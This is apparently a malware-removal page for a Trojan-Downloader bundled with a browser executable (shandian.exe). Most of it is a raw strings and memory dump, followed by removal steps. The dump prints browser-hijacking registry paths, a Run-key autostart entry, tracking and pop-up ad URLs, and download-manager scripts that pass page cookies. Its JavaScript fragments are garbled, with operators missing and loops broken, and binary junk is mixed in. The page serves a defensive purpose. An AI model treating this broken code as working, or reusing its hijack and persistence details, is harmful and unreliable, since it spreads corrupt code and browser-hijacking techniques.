tw_setOptVal("twhome", "showurl", url_show = url_show == "0" ? "1" : "0"), Urlshow();
function InitUrlList() {
btn.innerHTML = "";
url_show = external.getOptionValue(g_s_id, "twhome", "showurl"), url_show = url_show || '1', Urlshow();
function clearFullUrl () {
for(var i = 0, tU = lastUrl,tOU = oldUrl; i < tU.length   tOU.length; i   )
external.twdeletelasturl(window, '', i < tU.length ? tU[i] : tOU[i - tU.length], i < tU.length ? 0 : 1);
lastUrlName = [], lastUrl = [], oldUrlName = [], oldUrl = [];
url_item.innerHTML = '', url_show = '0', Urlshow();
function getDomainByUrl( strUrl ) {return strUrl.replace(/^(http:\/\/[^\/] )\/.*/g, "$1");}
var tryPath = external.twGetAppPath(g_s_id), strUrl = "user2.gif", tId = encodeURIComponent(strDomain)   parseInt(Math.random() * 1000, 10);
if (strDomain && strDomain.length)
strDomain  = (strDomain.length - 1 != strDomain.lastIndexOf("/") ? '/' : ''), strUrl = strDomain.length > 1 ? strDomain   "favicon.ico" : strUrl;
tImg.onload = function () {_id(tId).src = this.src;}
tImg.src = tryPath   '/ImgCache/'   strUrl.replace(/\w*:\/\//, '').replace(/\//g, '_');
return "";
while(line = external.getOptionValue(g_s_id, "twhome", "qp" i)){
dataList.push(line);
return (dataList.length==0)? null:dataList;
this.clearData();
if(!dataList.length)
for(var i=0,len=dataList.length;iexternal.setOptionValue(g_s_id, "twhome", "qp" i, dataList[i]);
external.setOptionValue(g_s_id, "twhome", "qp" i, '');
function QP_assign(url){
external.twnewnavigate(window, g_s_id, url, 0, 0, 0, 0);
function QP_adjustUrl(url){
if(pattern.test(url))
return url;
return "http://" url;
var list = QPLocalDataMgr.readData();
var strBuf = external.GetQuickPathValue(g_s_id);
if(strBuf.length){
list = strBuf.split(":&:");
list.pop();
if(list && list.length>0) {
for(var i = 0; i < _strQPItem.length; i    )
temp = _strQPItem[i].split( ":^:" ), strDomain = getDomainByUrl( temp[0] ), strHTML  = ""   QP_InsertFavIcon( strDomain )   ""   filter(temp[1])   "
";
qp_item.innerHTML = strHTML   "";
for (var i = 0, tA = _tag('a', qp_item);i < tA.length; i   )
tA[i].className = tA[i].offsetWidth > 122 ? 'overflowHide' : '';
_userPages = false, qp_tip.style.display='inline', qp_item.style.display='none';
_id('topImg_1').style.filter = 'alpha(opacity='   (qp_show == '0' ? 50 : 99)   ')';
quickpath.style.display = (qp_show == '0' ? 'none' : 'inline'), qp_show == '0' || QP_LoadItem();
btn.innerHTML = "";
qp_show = external.getOptionValue(g_s_id, "twhome", "showqp"), QPshow();
for(var i = 0; i < _strQPItem.length; i    )
temp = _strQPItem[i].split(":^:"), SetArray(g_nCountVB   , temp[0]);
for(var i = 0, strName, col = _tag('li', ul_item), colInput, colInputURL; i < col.length; i    ) {
colInput[0].style.backgroundColor = '', colInput[1].style.backgroundColor = '';
if (colInput[1].value.trim()) {
colInputURL = colInput[1].value.trim();
if(!validateInput(colInputURL)) {
colInput[1].style.backgroundColor = '#f00', colInput[1].focus();
strName = colInput[0].value.trim();
colInput[0].style.backgroundColor = '#f00', colInput[0].focus();
strBufSave  = colInputURL   ':^:', strBufSave  = (strName ? strName : colInputURL)   ':&:';
list.push(colInputURL   ':^:'  (strName ? strName : colInputURL));
else if (colInput[0].value.trim()) {
colInputURL = colInput[0].value.trim();
if(colInputURL == '&' || colInputURL.indexOf(':&') != -1 || colInputURL.indexOf('&:') != -1 || colInputURL.indexOf(':^') != -1 || colInputURL.indexOf('^:') != -1) {
strBufSave  = colInputURL   ':^:'   colInputURL   ':&:';
list.push(colInputURL   ':^:'   colInputURL);
external.SetQuickPathValue(g_s_id, strBufSave);
QPLocalDataMgr.saveData(list);
if(input == '&' || input.indexOf(':&') != -1 || input.indexOf('&:') != -1 || input.indexOf(':^') != -1 || input.indexOf('^:') != -1) {
oNewNode.style.padding = '0', oNewNode.style.margin = '0 0 -5 0';
oNewNode.innerHTML = ""  
""  
""  
"

";
ul_item.appendChild(oNewNode);
if(lis.length > 12) {
for(var i = 12; i < lis.length;)
tItems.push(ul_item.removeChild(lis[i]));
ul_item.style.height = ul_item.offsetHeight 'px';
ul_item.style.overflowX = 'hidden';
ul_item.style.overflowY = 'auto';
ul_item.style.marginTop = '0px';
tWarp.style.width = '530px';
tTitUl.style.marginRight = '45px';
tSep.style.marginRight = '40px';
for(var i = 0; i < tItems.length; i )
ul_item.appendChild(tItems[i]);
else if (lis.length == 12) {
tWarp.style.width = '505px';
tTitUl.style.marginRight = '20px';
tSep.style.marginRight = '15px';
ul_item.style.height = '', ul_item.style.overflowY = 'hidden';
_ef.move(_ef.pane.offsetLeft, _ef.pane.offsetTop);
_tag('textarea', lis[idx ? idx - 1 : lis.length - 1])[0].focus();
parent = obj.parentElement.parentElement,
if (col.length <= 6)
_tag('img', parent)[0].src = 'user2.gif', tArea[0].innerHTML = '', tArea[1].innerHTML = '';
parent.removeNode(true), col.length == 12 && valiItemNumber();
function doOperations () {
var warp = _ef.create('div', '', {'id': 'warp'}, {'border': '1 solid #3499CB','overflow' : 'hidden' , 'width': '505px', 'padding': '0'}), quick = _ef.create('div', '', {}, {'textAlign': 'left', 'padding': '0'}),
tFrame = _ef.create('div', '', {'className': 'title_frame'}, {'margin': '0', 'padding': '10 0 2 0', 'cursor': 'move'}), ulItem = _ef.create('ul', '', {'id': 'ul_item'}, {'width': '97%', 'margin': '-5 3 5 3'}),
qp_item = _ef.create('div', '', {'id': 'qp_item'}, {'margin': '-1 5 0 0', 'textAlign': 'left'}), opTool = _ef.create('div', '', {}, {'textAlign': 'left', 'margin': '0 0 0 7'}),
celBn = _ef.create('button', _tpCancel, {}, {'width': '72px', 'height': '30px', 'margin': '15 0 15 18'}, function () {_ef.close();})
tFrame.appendChild(_ef.create('div', _tpQuickPath, {'className': 'title_l'}, {'margin': '0 0 0 8'})), tFrame.appendChild(_ef.create('div', '
', {'className': 'title_r'}));
tFrame.onmousedown = function () {
x = event.clientX, y = event.clientY, isDrag = true, _ef.fade(0.62);
bEvent.push(_ef.$dom.body.onmousemove, _ef.$dom.body.onmouseout, _ef.$dom.body.onmouseup);
_ef.$dom.body.onmousemove = function () {
if (isDrag && window.event.button) {
var curPX = (_ef.pane.offsetLeft event.clientX - x), curPY = (_ef.pane.offsetTop event.clientY - y),
tWidth = document.body.clientWidth - _ef.pane.offsetWidth, tHeight = document.body.clientHeight - _ef.pane.offsetHeight;
_ef.move(curPX < 0 ? 0 : curPX > tWidth ? tWidth : curPX,
curPY < 0 ? 0 : curPY > tHeight ? tHeight : curPY), x = event.clientX, y = event.clientY;
else if(isDrag && !window.event.button)
_ef.$dom.body.onmouseup = doMouseUp;
for (var i = 0, temp, str, nCount = _strQPItem.length; i < (nCount > 6 ? nCount : 6); i ) {
temp = _strQPItem[i].split(":^:"), str = getDomainByUrl(temp[0]);
var tLi = _ef.create('li', '', {}, {'padding': '0', 'margin': '0 0 -5 0'}), tDiv = _ef.create('div', '', {}, {'paddingLeft': '0px'});
tDiv.innerHTML = QP_InsertFavIcon(i < nCount - 1 ? temp[0] : null);
tDiv.innerHTML = "" (i < nCount ? filter(temp[1]) : '') "";
tDiv.innerHTML = "" (i < nCount ? filter(temp[0]) : '') "";
tDiv.innerHTML = "";
tLi.appendChild(tDiv), ulItem.appendChild(tLi);
_ef.open(), qp_item.appendChild(ulItem), qp_item.innerHTML = '' _tpAddURL '';
opTool.appendChild(_ef.create('button', _tpOK, {}, {'width': '72px', 'height': '30px', 'margin': '15 30 15 10'}, function () {QP_Save() && (location.reload())})),
opTool.appendChild(celBn),
qp_item.appendChild(opTool), quick.appendChild(tFrame), quick.appendChild(_ef.create('div', '', {'id': '_tw_quick_separator', 'className': 'separator'}, {'margin': '0 15 -10 15'}));
quick.appendChild(_ef.create('div', '' _tpName '', {'id': '_tpName'}, {'styleFloat': 'left', 'width': '200px', 'textAlign': 'left', 'paddingLeft': '39px', 'fontSize': '12px', 'margin': '0'})),
quick.appendChild(_ef.create('div', '' _tpAddress '', {'id': '_tpAddress'}, {'styleFloat': 'left', 'width': '280px', 'textAlign': 'left', 'paddingLeft': '37px', 'fontSize': '12px', 'margin': '0'})),
quick.appendChild(qp_item), warp.appendChild(quick), _ef.setBody(warp);
_ef.move((_ef.$dom.body.offsetWidth - 515) / 2, (_ef.$dom.body.clientHeight - 480) / 4), valiItemNumber(1);
isDrag = false, _ef.fade(0.99),
_ef.$dom.body.onmousemove = bEvent[0] || null,
_ef.$dom.body.onmouseout = bEvent[1] || null,
_ef.$dom.body.onmouseup = bEvent[2] || null,
document.body.onkeypress = function doKeyPress() {
if (event.keyCode == 13)
return QP_Save() ? location.reload() : false;
celBn.onblur = function () {
clImg.offsetWidth && clImg.focus();
external.SetOptionValue(g_s_id, n, k, v);
String.prototype.trim = function () {return this.replace(/(^\s*)|(\s*$)/g, '');}
str = str.replace(/&/g, '&');
str = str.replace(/
str = str.replace(/>/g, '>');
str = str.replace(/'/g, '´');
str = str.replace(/"/g, '"');
str = str.replace(/\|/g, '¦');
function _id (id) {return document.getElementById(id);}
P#VQm.ZJN4
version="2.0.0.1"
name="TheWorld.exe"/>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
7>Url
%XZ9A
}).bf~
whCQ D.hs
z"%U?
.IDATx
weBR&E
\/:*?"<>|
%s\%s
%s\%s.url
%s(%d)%s
%d,0,0,0,700,0,0,0,%d,0,0,0,0,%s
%d,0,0,0,0,0,0,0,%d,0,0,0,0,%s
%sskin\%s
by %s ver: %s
%s: %s
by %s, ver: %s
%sskin\%s\preview.png
%sskin\%s\skin.ini
res://%s/IMG_PREVIEW
plugin.ini
theworld.ac
ADDRESS_URL
http://www.fjmjm.com/web/navierr
Software\Microsoft\Internet Explorer\TypedUrls
%s\%s\
%s\*.*
Psc.js
bypassdomain%d
url%d
exdm%d
redm%d
boundm%d
exd%d
red%d
exh%d
reh%d
bypass%d
qzone.qq.com
http://
%*.*f
%s%u.dat
%sca%u.dat
tw_form_url
password
form.ini
login
nick
loginuser
%s%saction=f&ver=%s&guid=%s
%s%saction=a&ver=%s&guid=%s
%s%saction=m&ver=%s&guid=%s
http://stat.fjmjm.com/web/theworld2up.ini
2.4.1.9
SUBVER_%s
%sTheWorld_%s_%s.zip
TheWorld.exe
%s%s%s
TheWorld.ini
%s %s
Update.ini
WWW_OpenURLNewWindow
WWW_OpenURL
%d_info
%d_url
dltool.ini
TheWorld.xml
%c:\%s\
%s.%s
index.htm
%s#MetalinkFile%d
DefaultPassword
DefaultLogin
StateWindowSize
%H:%M:%S
%Y-%m-%d %H:%M:%S
Path%d
1.0.0.0
2.0.0.0
%s%s(%d)%s
%s KB
%s %s, %s
%s,%s
MIME\Database\Content Type\%s
.aspx
%d:%s
%d.%d.%d %s
0xx
Name:%s
Version:%s
FileVersion:%s
CmdLine:%s
Module:%s
Module Version:%s
Code:%s
Offset:%s
OS Version:%s
IE Version:%s
multipart/form-data; boundary=%s
http://feedback.theworld.cn/collection/
dbghelp.dll
|.url|.lnk|.htm|.html|.txt|
http://www.theworld.cn/client/sync
favsorder.db
%s*.*
.ShellClassInfo
%s\Desktop.ini
FAV_URL
%s (%d)
,tww=d
%s_url
.shtml
%s://%s/favicon.ico
%s%s_favicon.ico
%s\url.dll
http://about:blank
"%s" "%%1"
%s\%s\command
https
%s\%s\UserChoice
.mhtml
.shtm
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\ftp\UserChoice
TheWorld.AssocFile.MHT\Shell
TheWorld.AssocFile.HTM\Shell
TheWorld.HTTP\Shell
TheWorld.AssocFile.MHT\DefaultIcon
IE.AssocFile.MHT\DefaultIcon
TheWorld.HTTP\DefaultIcon
TheWorld.AssocFile.HTM\DefaultIcon
IE.AssocFile.HTM\DefaultIcon
IE.HTTP
IE.AssocFile.MHT
IE.AssocFile.HTM
TheWorld.HTTP
TheWorld.AssocFile.MHT
TheWorld.AssocFile.HTM
SOFTWARE\Classes\.mhtml
SOFTWARE\Classes\.mht
SOFTWARE\Classes\.shtml
SOFTWARE\Classes\.shtm
SOFTWARE\Classes\.html
SOFTWARE\Classes\.htm
ftp\shell
https\DefaultIcon
http\DefaultIcon
%SystemRoot%\system32\url.dll,0
https\shell
http\shell
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
SOFTWARE\Clients\StartMenuInternet\%s\shell\open\command
IEXPLORE.EXE
SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE
SOFTWARE\Clients\StartMenuInternet\%s\
-1,-1,-1,-1
CLSID\%s\TreatAs
CLSID\%s\LocalServer32
CLSID\%s\InprocServer32
%s\CLSID
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
%s\Internet Explorer\iexplore.exe
ftp://
https://
.net.cn
.com.cn
*www.*.*
%s%s\
skin.ini
%sUpdate\%s\
Version%d
File%d
Name%d
dailytips.ini
%slanguages\dailytips_%s
%s?ver=%s&c=%d&guid=%s
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SCRIPTURL_MITIGATION
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE
?url=
Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WEBOC_OMNAVIGATOR_IMPLEMENTATION
HisSearchLeftPad
system32\verclsid.exe
CLSID\{08B0E5C0-4FCB-11CF-AAA5-00401C608501}\TreatAs
wininet.dll
kernel32.dll
shell32.dll
D27CDB6E-AE6D-11cf-96B8-444553540000
6BF52A52-394A-11d3-B153-00C04F79FAA6
22d6f312-b0f6-11d0-94ab-0080c74c7e95
02BF25D5-8C17-4B23-BC80-D3488ABDDC6B
CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA
%s\vbscript.dll
[^"' >]*
[^"' >]{1}
$ -^|:'./"()[]{}
[^"' >]*?
ntdll.dll
%s%s.url
|.url|
TWINFO.HTM
InsertInfoItemByHTML( %d, %d, %d, "%s", "%s" );
SearchLeftPad
AdressLeftPad
%s:%s
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http://www.fjmjm.com/cn/help-appendix-04.htm
http://www.theworld.cn/
http://www.fjmjm.com/cn/help.htm
TWFORM.HTM
StatusPluginKey
http://www.fjmjm.com/cn/guide/guide_start.htm
http://www.fjmjm.com/wz
http://bbs.fjmjm.com
%s&guid=%s&lastver=%s
2.1.2.2
2.1.2.4
2.1.0.2
2.0.5.1
2.0.3.4
2.3.0.7
2.3.0.8
2.2.1.0
2.2.1.2
2.2.1.4
NAVIERR.HTM
TheWorld.ico
http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%s
http://www.google.com.hk/search?q=
baidu.com/baidu?
baidu.com/s
https:
TheWorld2_AppHotKey
(%d-%d, %d-%d)
%%SaveObjUrl
MediaSaver.js
%sMouseGesture_%d.bmp
%s%s\MouseGesture_%d.bmp
RecentUrl
OldUrl
LastUrl
TempUrl
LockUrl
TWHOME.HTM
[TempUrl]
http://%s
twcache.ini
%s(%u)
%d*%d
external.menuArguments
General_%d
%s%s\%s\plugin.ini
%s%s\%s
TWSTATUSMSG
{1FBA04EE-3024-11D2-8F1F-0000F87ABD16}
CLSID\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects
TWOPTIONS.HTM
%s\%s\%s
%sUpdate.ini
SetSearchKey
twgetlasturl
twdeletelasturl
ImportExportFav
GetXmlHttpObj
\theme.ini
%sStartPage\Components\%s
%sStartPage\Themes\%s
%s,%s,%s
twcommon_%d
http://www.theworld.cn/client/down
http://www.theworld.cn/client/up
http://theworld.cn/
http://fjmjm.com/
http://www.fjmjm.com/
%sTheWorld\Update\
%s.zip
Load VBScript.dll failed
%s|%s
%s - %s
http://www.
XMLRequestMsg
SaveClosedUrl
AddressHistory
AAutoKey
SAutoKey
BossKey
UseBossKey
HTTPFilter
ShowLUrlList
SafeExecAll
SafeExec
TreatFBKeyAsTabKey
%s%s%s%s
google.com.hk
google.com
zhidao.baidu.com
http://www.google.cn/search?client=aff-cs-worldbrowser
google.cn
http://www.google.cn/webhp?client=
*@*.txt
:\e161255a-37c3-11d2-bcaa-00c04fd929db
Software\Microsoft\Internet Explorer\TypedURLs
%s?ver=%s&guid=%s&c=%d
http://www.fjmjm.com/web/inst.htm
http://www.fjmjm.com/web/uninst.htm
Site.ini
MFC42U.dll
%s?url=%s&domain=%s&code=%u
http://www.fjmjm.com/web/
AB.GIF
LOGO.JPG
LOGO.GIF
LOGO.PNG
shdoclc.dll/
ieframe.dll/
=http://auto.search.msn.com
color:#000000; background:#%s
%page.url
errorUrl
ieframe.dll
SHDOCLC.DLL
https://www
http://www
0%d:^:%d:^:%d:^:%d:^:%s:^:%s
LeftPad
mailto:?subject=From Browser&body=%s
https://spreadsheets.google.com/
http://spreadsheets.google.com/
https://docs.google.com/
http://docs.google.com/
00000409
00000404
REST %d
200 PORT
HTTP/1.1
Content-Type: %s
Content-Length: %d
Cookie: %s
User-Agent: %s
Range: bytes=%s-
546865576F726C64-86C36F73-2C25-4a7d-91EA-F5581018A42D
http://127.0.0.1/%s
:/\*?"<>|.
%d.%d.%d.%d
\StringFileInfo\xx\%s
%s%d.%s
mapi32.dll
iexplore.exe
http://www.google.cn/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=
%s???.dll
%u - ???
%s.tmp
%s.ini
advapi32.dll
%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s
res://%s/%s
rSHDOCVW.DLL
%s %s
i\internet explorer\iexplore.exe
Msxml2.XMLHTTP.2.0
Msxml2.XMLHTTP.3.0
Msxml2.XMLHTTP.4.0
Msxml2.XMLHTTP.5.0
dwmapi.dll
uxtheme.dll
RebarC%d
RebarB%d
RebarA%d
Local\%d%s
res://%s/
%sskin.ini
skin\%s
XTabDrag:%s
USER32.DLL
%Documents and Settings%\%current user%\Local Settings\Temp\
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\
%WinDir%\
c:\program files\shandian\bin\shandian.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\TheWorld\Update\
C:\PROGRA~1\shandian\bin\Site.ini
C:\PROGRA~1\shandian\bin\theworld.ac
tart downloading from site: http://123.sogou.com/?22014
http://www.fjmjm.com/web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a48795834002140088
http://www.jlbnh.com
C:\PROGRA~1\shandian\bin\twcache.ini
%Documents and Settings%\%current user%\Favorites
%Documents and Settings%\%current user%\Local Settings\History
C:\PROGRA~1\shandian\bin\TheWorld.xml
res://%Program Files%\shandian\bin\shandian.exe/NAVIERR.HTM
web/welcome_cn.htm?ver=2.4.1.9&guid=a24a7d04104ebf0095dce7c62dcb34c065ffccc6f6834a08ba51a487958340021400889203&lastver=
%Program Files%\shandian\bin\shandian.ini
res://%Program Files%\shandian\bin\shandian.exe/IL_GESTURE
res://%Program Files%\shandian\bin\shandian.exe/
ARROW.GIF
CALLAPSE.GIF
CALLAPSE_HOVER.GIF
CANCEL.GIF
CLOSE.GIF
DELETE.GIF
EFFECT.JS
EXPAND.GIF
EXPAND_HOVER.GIF
FORMTITLE.GIF
HELP.GIF
INCREASE.GIF
INFO.GIF
INFO_1.GIF
IOAGE.CSS
LINE.GIF
MORE1.GIF
MORE2.GIF
OK.GIF
SZTOP.GIF
SZTOP2.GIF
TOP1.GIF
TOP2.GIF
TOP3.GIF
TWFORMDEFINE.JS
TWOPTIONS.JS
TWOPTIONS.VBS
TWOPTIONSDEFINE.JS
TWPAGE.CSS
TWPAGE_DELETE.GIF
TWPAGE_OLD.GIF
TWPAGE_TOP.GIF
TWWEBDEFINE.JS
TWWEBUTIL.JS
USER.GIF
USER2.GIF
ProgID=JetCar.Netscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("JetCar.Netscape"):if err<>0 then:MsgBox("FlashGet not properly installed!" vbCrLf "Please install FlashGet again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=FG2CatchUrl.Netscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("FG2CatchUrl.Netscape"):if err<>0 then:MsgBox("FlashGet 2 not properly installed!" vbCrLf "Please install FlashGet 2 again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=BHO.IFlashGetNetscape
Script=On Error Resume Next:set JetCarCatch=CreateObject("BHO.IFlashGetNetscape"):if err<>0 then:MsgBox("FlashGet mini not properly installed!" vbCrLf "Please install FlashGet mini again"):else:call JetCarCatch.AddUrl("%d_url","%d_info","%page.url"):end if
ProgID=NetAnts.API
script=On Error Resume Next:set NetAntsApi=CreateObject("NetAnts.API"):if err<>0 then:MsgBox("NetAnts not properly installed on this PC!"):else:if NetAntsApi.IsUrlExist("%d_url") then : MsgBox("%d_url" vbCrLf "already in queue"):else:call NetAntsApi.AddUrl("%d_url", "%d_info", "%page.url"):end if
ProgID=LeechGetIE.AddURL
script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.AddURL"):if err<>0 then:MsgBox("LeechIE.dll is not registered. Please run `regsvr32.exe LeechIE.dll'"):else:call LeechGet.AddUrl("%d_url"):end if
ProgID=LeechGetIE.LeechIE
script=On Error Resume Next:set LeechGet=CreateObject("LeechGetIE.LeechIE"):if err<>0 then:MsgBox("download express is not installed yet"):else:call LeechGet.AddUrl("%d_url"):end if
ProgID=dapie.catcher
script=On Error Resume Next:set DAPExt=CreateObject("dapie.catcher"):if err<>0 then:MsgBox("DAPIE.DLL is not registered or corrupted. Please re-install Download Accelerator Plus"):else:call DAPExt.MenuUrl("%d_url", "%page.url", ""):end if
ProgID=NTIEHelper.NTIEAddUrl
Script=On Error Resume Next:set Obj=CreateObject("NTIEHelper.NTIEAddUrl"):if err<>0 then:MsgBox("NetTransport2 not properly installed!" vbCrLf "Please install NetTransport2 again"):else:call Obj.AddLink("%d_url","%d_url","%d_info"):end if
ProgID=ThunderAgent.Agent
script=On Error Resume Next:set ThunderAgent = CreateObject("ThunderAgEnt.Agent.1"):if err<>0 then:
MsgBox("Thunder is not installed properly!Please Install IDM again"):
call ThunderAgent.AddTask4("%d_url", "", "", "%d_info", "%page.url", -1, 0, -1, document.cookie, "", ""):call ThunderAgent.CommitTasks2(1):set ThunderAgent = nothing:end if
ProgID=xunleibho.CatchRightClick.1
script=On Error Resume Next:set ThunderApi = CreateObject("xunleibho.CatchRightClick.1"):if err<>0 then:
Info="#*01#*" "%d_url" "#*02#*" document.Url "#*03#*" "%d_info" "#*04#*thunder_mini#*05#*"\nr=ThunderApi.sendUrl(Info)
Info="#*01#*" "%d_url" "#*02#*" document.Url "#*03#*" "%d_info" "#*04#*
4#*05#*"\nr=ThunderApi.sendUrl(Info)
ProgID=ThunderServer.WebThunder.1
Script=On Error Resume Next:Set obj=CreateObject("ThunderServer.WebThunder"):If Err<>0 Then:MsgBox("Web
not properly installed!"):Else:Call obj.CallAddTask2("%d_url", "%d_info", "%page.url", 1, "", "", ""):End If
ProgID=NxApi.myComponent
script=On Error Resume Next\nset WGApi=CreateObject("NxApi.myComponent")\nif err<>0 then\nelse\ncall WGApi.AddUrl("%d_url","%d_info","%page.url")\n\nend if
ProgID=DuInvoke.Du_Invoke
script=On Error Resume Next\nset duObject=CreateObject("DuInvoke.Du_Invoke")\nif err<>0 then \n
MsgBox("DownUp2U not properly installed!" vbCrLf "Please install DownUp2U again")\n
else\n call duObject.DownloadOneLink( "%d_url", "%page.url", "%d_info" )\n end if
ProgID=PNP.InterfaceCore.1
if left("%d_url", 5) = "is://" then \n window.navigate("%d_url") \n
ISLink = "is://|link_down|" "%d_info" "|" "%d_url" "|" document.Url "/" \n window.navigate(ISLink)\n end if
ProgID=TuoTuHelper.RDown
set xDownCatch=CreateObject("TuoTuHelper.RDown") :if err<>0 then:
MsgBox("Tuotu
else: call xDownCatch.AddText( "%d_url", "%d_info", document.Url): end if
ProgID=QQIEHelper.QQRightClick.2
Script=On Error Resume Next:set QQRightClick=CreateObject("QQIEHelper.QQRightClick.2"):if err<>0 then:MsgBox("QQDownload not properly installed on this PC!"):else:call QQRightClick.sendUrl2("%d_url",document.Url,"%d_info",document.cookie,0,0):end if
ProgID=Orbitmxt.Orbit
Script=On Error Resume Next:Set obj=CreateObject("Orbitmxt.Orbit"):If Err<>0 Then:MsgBox("Orbit not properly installed!"):Else:Call obj.download("%d_url", "%d_info", "%page.url", ""):End If
ProgID=NXIEHelper.NXIEAddURL
Script=On Error Resume Next:Set obj=CreateObject("NXIEHelper.NXIEAddURL"):If Err<>0 Then:MsgBox("
not properly installed!"):Else:Call obj.AddLink("%page.url","%d_url", "%d_info" ):End If
ProgID=DownlWithIDM.LinkProcessor
script=On Error Resume Next:set IDMLinkProcessor=CreateObject("DownlWithIDM.LinkProcessor"):IDMLinkProcessor.Execute( external.menuArguments )
msctls_hotkey32
HotKey1
%s-ansi
%us-unicode
:http://www.google.com.hk/search?q=%s
:http://www.google.com
GWeb
(*.htm;*.html;*.mht;*.url)|*.htm;*.html;*.mht;*.url|
(*.*)|*.*|
!18,0,0,0,0,0,0,0,134,0,0,5,0,
#18,0,0,0,700,0,0,0,134,0,0,5,0,
:%d/%d/%d
.http://www.fjmjm.com/web/welcome_cn.htm?ver=%s
:^:1:^:http://www.baidu.com/baidu?word=%us&tn=ichuner_4_pg&ie=utf-8:^:b:^:http://www.baidu.com/s?tn=ichuner_4_pg
1:^:Google:^:1:^:http://www.google.com.hk/search?client=aff-cs-worldbrowser&forid=1&ie=utf-8&oe=UTF-8&hl=zh-CN&q=%us:^:g:^:http://www.google.com.hk/webhp?client=aff-worldbrowser&ie=utf-8&oe=UTF-8&hl=zh-CN
(*.png)|*.png|JPEG
(*.jpg;*.jpeg)|*.jpg;*.jpeg;|
(*.bmp)|*.bmp|
http://www.fjmjm.com/cn/skin.htm
#http://www.fjmjm.com/cn/plugins.htm
(*.txt;*.text;)|*.txt;*.text;|
(*.*)|*.*|0
!http://www.fjmjm.com/cn/index.htm
(http://www.fjmjm.com/hl/cn/dailytips.ini$http://www.fjmjm.com/web/navierr.htm
(*.flv*;*.mp*;*.mov*;*.rm*;*.wm?*;*.asf*;*.avi*;*.wav*;*.mid*)
(*.swf*)
(*.js*;*.vbs*;*.css*)
)http://www.fjmjm.com/hl/cn/browsemode.htm
)http://www.fjmjm.com/hl/cn/rendermode.htm
%s ...
: %d%%
...*http://www.fjmjm.com/web/web_search_cn.htm
(*.htm;*.html;)|*.htm;*.html|
.http://www.baidu.com/index.php?tn=ichuner_2_pg
2, 4, 1, 9
Lightning.exe
shandian.exe_3776_rwx_3CF78000_00001000:

=*2"=*2"=
shandian.exe_3776_rwx_3D930000_00001000:

.text
`.data
.rsrc
@.reloc
sdad.exe_3824:

.text
`.rdata
@.data
.rsrc
@.reloc
vSSSh
FTPjK
FtPj;
C.PjRV
tGHt.Ht&
Software\Microsoft\Windows\CurrentVersion\Run
PopWinParam.xml
setup.ini
1.0.0
20131020010000
/web/PopWinParam.asp?d=2014419&mainver=%s&popver=%s&xmlver=%s
%d.%d.%d
%d:%d
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
&#xX;
%s="%s"
%s='%s'
version="%s"
encoding="%s"
standalone="%s"
isShow
kernel32.dll
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
portuguese-brazilian
operator
GetProcessWindowStation
USER32.DLL
KERNEL32.dll
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyA
RegDeleteKeyA
RegCreateKeyExA
RegOpenKeyExA
RegEnumKeyExA
RegQueryInfoKeyA
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
imagehlp.dll
VERSION.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
.?AUDWebBrowserEvents2@@
http://stat.fjmjm.com
http://www.fjmjm.com
zcÁ
%Program Files%\shandian\bin\sdad.exe
>>>222:::
:::222@@@
@@@222:::
:::222>>>
4-6}6
8$8(8,808
<*=0=4=8=<=
>!>%>@>}>
0#0'0 0/0
1$2(2,2\2`2
0,080\0|0
1$1,181\1|1
nshell.Explorer.2
ekernel32.dll
KERNEL32.DLL
mscoree.dll
Replace%Select the entire document
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
1, 0, 0, 1
mini.exe

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.

Update the definition files.

Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):

shandian.exe:3748

Delete the original Trojan-Downloader file.

Delete or disinfect the following files created/modified by the Trojan-Downloader:

%Program Files%\shandian\ico\360.ico (32 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explorer.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp\bind.dll (2530 bytes)
